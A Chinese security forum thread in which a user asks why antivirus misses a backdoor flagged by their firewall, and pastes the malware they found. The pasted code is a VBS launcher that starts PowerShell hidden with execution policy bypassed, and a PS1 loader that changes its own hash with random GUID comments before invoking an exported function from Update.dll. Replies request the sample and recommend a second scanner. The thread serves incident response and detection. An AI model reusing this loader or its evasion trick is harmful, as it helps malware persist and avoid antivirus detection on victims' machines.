为啥病毒查不出来
本帖最后由 单单不知道 于 2025-3-26 12:39 编辑防火墙上看到主机有病毒【后门软件Gh0st变种之毒鼠请求通信】记录
找到了主机,并进行360全盘杀毒,结果发现还是有
后面根据netstat 找到进程,并一层一层找,发现就是个自动计划,以及ps1执行文件,为啥这都扫不出来
本帖最后由 单单不知道 于 2025-3-26 12:44 编辑
发不了图片也发不来附件额
一个Promotions.ps1,配合logs.vbs,以及一个update.dll。
然后好像会冒充自动更新的弹窗在右下角弹出 Set objShell = CreateObject("WScript.Shell")
RoamingPath = objShell.ExpandEnvironmentStrings("%APPDATA%")
FilePath = RoamingPath & "\Promotions\Promotions.ps1"
objShell.Run "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File """ & FilePath & """", 0, False
--------------------
# cd446a9f-0f7a-4d6c-9690-83345ad03192
# 986c8e2a-44c2-4fea-b39c-92a30683020a
# df8ffc26-00fc-410b-ba61-b2930632657a
# 0877ce74-ec31-4e59-aa33-753341bc8395
# ee50f5b8-17c7-431c-9b7d-480f4287b475
# 068d6abc-de0f-4610-bd2e-7e7487bb125b
# 8514e670-b369-4876-a875-e29d0d937b16
# 595e9138-d7d7-4127-98b2-242a86aea55c
# 9e95823a-c5c5-4279-a3c9-e30995c22003
# 65bb70fe-2ea2-444c-9a9b-581f9090fc71
# 9eba9004-601f-4a0a-9779-4310a646ee93
# 39e43e28-213b-4b5b-8b5f-7f69de41221e
# a84c1659-7e13-4680-bbbf-36f9e998ebfe
# 153145aa-2415-4473-943a-7d4e45efebd8
# 5a5e05f6-75b7-4439-b374-204938e96f40
# e3e92115-d175-49d6-a7d3-78ef769c3ace
# 02c0ddfe-2458-4953-93b4-b7bdf5b8fb4d
# e4ea483c-b327-499d-b68e-a21577220d24
# 2de2f16a-e75a-48cc-9440-bf9c725b5cac
# 58fb079f-76b4-4eb8-831f-c404a1c26c1b
# ea0bd099-3dcf-4b5d-b667-c209c9c39d05
# 5cf23d82-6a6e-46a9-9c5e-35e25f58e791
# 817a78c3-5ae9-45f2-80de-c70b8aba5132
# 7119dd13-55ae-4c0e-8467-659363ec7c11
# 3c5432a3-8eba-4a2c-85b5-957c92b9e916
$scriptPath = $MyInvocation.MyCommand.Path
$fileContent = Get-Content -Path $scriptPath -Raw
$uuid = ::NewGuid().ToString()
$randomCommentHeader = "`r`n# $uuid"
$randomCommentFooter = "`r`n#$uuid"
$fileContent = $randomCommentHeader + $fileContent + $randomCommentFooter
Set-Content -Path $scriptPath -Value $fileContent
$RoamingDir = ::GetFolderPath('ApplicationData')
$DllPath = Join-Path $RoamingDir "Promotions\Update.dll"
$DllPathEscaped = $DllPath -replace '\\', '\\\\'
#asd
$code = @"
using System;
using System.Runtime.InteropServices;
public class DllInvoker
{
public static extern void TCGamerUpdateMain();
}
"@
Add-Type -TypeDefinition $code
::TCGamerUpdateMain()
$md5 = ::Create()
$fileStream = ::OpenRead($scriptPath)
$hashBytes = $md5.ComputeHash($fileStream)
$fileStream.Close()
#3c5432a3-8eba-4a2c-85b5-957c92b9e916
#7119dd13-55ae-4c0e-8467-659363ec7c11
#817a78c3-5ae9-45f2-80de-c70b8aba5132
#5cf23d82-6a6e-46a9-9c5e-35e25f58e791
#ea0bd099-3dcf-4b5d-b667-c209c9c39d05
#58fb079f-76b4-4eb8-831f-c404a1c26c1b
#2de2f16a-e75a-48cc-9440-bf9c725b5cac
#e4ea483c-b327-499d-b68e-a21577220d24
#02c0ddfe-2458-4953-93b4-b7bdf5b8fb4d
#e3e92115-d175-49d6-a7d3-78ef769c3ace
#5a5e05f6-75b7-4439-b374-204938e96f40
#153145aa-2415-4473-943a-7d4e45efebd8
#a84c1659-7e13-4680-bbbf-36f9e998ebfe
#39e43e28-213b-4b5b-8b5f-7f69de41221e
#9eba9004-601f-4a0a-9779-4310a646ee93
#65bb70fe-2ea2-444c-9a9b-581f9090fc71
#9e95823a-c5c5-4279-a3c9-e30995c22003
#595e9138-d7d7-4127-98b2-242a86aea55c
#8514e670-b369-4876-a875-e29d0d937b16
#068d6abc-de0f-4610-bd2e-7e7487bb125b
#ee50f5b8-17c7-431c-9b7d-480f4287b475
#0877ce74-ec31-4e59-aa33-753341bc8395
#df8ffc26-00fc-410b-ba61-b2930632657a
#986c8e2a-44c2-4fea-b39c-92a30683020a
#cd446a9f-0f7a-4d6c-9690-83345ad03192
您好,您加下我的微信,把样本发给我
360还是有少不出的东西,我是同时安装了360卫士和卡巴斯基杀毒,配合使用。360主防御,卡巴定时扫全盘,果然有些网站会偷偷下载脚本运行,按照卡巴的名字是一些广告插件或者流氓插件
页:
[1]